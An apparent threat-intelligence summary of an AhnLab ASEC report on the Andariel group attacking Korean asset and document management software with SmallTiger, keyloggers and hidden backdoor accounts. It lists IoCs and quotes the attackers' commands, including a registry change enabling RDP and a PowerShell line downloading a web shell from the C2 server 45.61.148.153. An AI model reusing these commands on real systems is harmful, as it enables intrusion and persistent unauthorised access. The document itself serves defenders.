Keypoints :
- The Andariel group has been attacking South Korean software since the past.
- Asset management solutions are frequently exploited, with malware installation commands executed post-compromise.
- SmallTiger is a primary malware used by the group.
- Brute force and dictionary attacks have been employed to seize control of update servers.
- Keyloggers are used to capture user keystrokes, storing them in “MsMpLog.tmp”.
- RDP access is configured for future access to infected systems.
- Recent attacks have also targeted outdated document management solutions.
- Advanced Port Scanner has been installed post-initial access.
- Corporate security managers are advised to strengthen monitoring and apply patches.
MITRE Techniques :
- Credential Dumping (T1003) – Keylogger captures user keystrokes.
- Remote Desktop Protocol (RDP) (T1076) – RDP access configured using SmallTiger.
- Exploitation of Public-Facing Application (T1190) – Attacks on outdated Apache Tomcat servers.
- Command and Control (C2) (T1071) – Use of download server as C&C for SmallTiger.
- Brute Force (T1110) – Control seized through brute force attacks on update servers.
Indicator of Compromise :
- [IP Address] 45[.]61[.]148[.]153
- [URL] http[:]//45[.]61[.]148[.]153/pizza[.]jsp
- [File Hash] 3525a8a16ce8988885d435133b3e85d8
- [File Hash] 45ef2e621f4c530437e186914c7a9c62
- [File Hash] 6a58b52b184715583cda792b56a0a1ed
- Check the article for all found IoCs.
The Andariel group has been attacking various software used by South Korean companies since the past [1]. Notably, these include asset management solutions and data loss prevention (DLP) solutions, and vulnerability attack cases have also been identified in various other solutions.
Attack cases by the Andariel group are continuing in the second half of 2024, primarily installing SmallTiger. [2] A major example of software targeted for exploitation is Korean asset management solutions that have been exploited for years, and there are also indications of exploitation involving a document centralization solution.
1. Attack Cases on Korean Asset Management Solutions
Asset management solutions are continuously exploited in attacks, and due to their nature, it is presumed that after the control server is compromised, the threat actor exploits it to execute malware installation commands. In most of these attack cases, ModeLoader was installed.
Additionally, there has been a case where control was seized through brute force and dictionary attacks on exposed update servers. In this case, the threat actor replaced the update program with SmallTiger, attempting to distribute SmallTiger across the systems within the organization through this process.
In the recently identified case, the method of initial access or specific distribution method has not been found, but SmallTiger was installed in the installation path of the asset management solution, and a keylogger was used alongside it. The keylogger is unique in that it stores the user’s keystrokes in the “MsMpLog.tmp” file in the same path.
Figure 1. Keylogging data
The threat actor configured the system to allow future RDP access to the infected system using SmallTiger. The following command used to activate RDP was executed through SmallTiger. Additionally, an open-source tool called CreateHiddenAccount was installed to add and conceal a backdoor account.
| > reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f |
Figure 2. RDP activation command executed through SmallTiger
2. Attack Cases on Document Management Solution
Recently, there have been indications of attacks targeting a Korean document management solution. The Apache Tomcat web servers used by this solution are all outdated versions, and it is presumed that the threat actor targets locations where the latest updates have not been applied.
Figure 3. Compromised web server with Korean document management solution installed
After initial access, the threat actor queried basic system information, and there is also a record of Advanced Port Scanner being installed.
| > ping 20.20.100.32 > tasklist > ipconfig /all > netstat -noa > whoami |
It is presumed that subsequently, a web shell is installed using the following PowerShell command. Currently, downloading is not possible, but the download server “45.61.148[.]153” is also identified as the C&C server address for SmallTiger in the aforementioned attack case.
| powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘hxxp://45.61.148[.]153/pizza.jsp’,’C:*********web*********threadstate.jsp’) |
3. Conclusion
ASEC has recently confirmed that the Andariel group is resuming their attacks using SmallTiger. The group has been exploiting various Korean solutions or attacking vulnerabilities to install malware since the past. The recently identified attack cases involve the ongoing exploitation of asset management solutions and newly identified indications of attacks against a Korean document management solution.
Corporate security managers should strengthen the monitoring of centralized management solutions like asset management solutions or document management solutions, and apply patches if there are any security vulnerabilities in the programs. They should also apply the latest patch for OS and programs such as internet browsers and update V3 to the latest version to prevent malware infection in advance.
Full Research: https://asec.ahnlab.com/en/85400/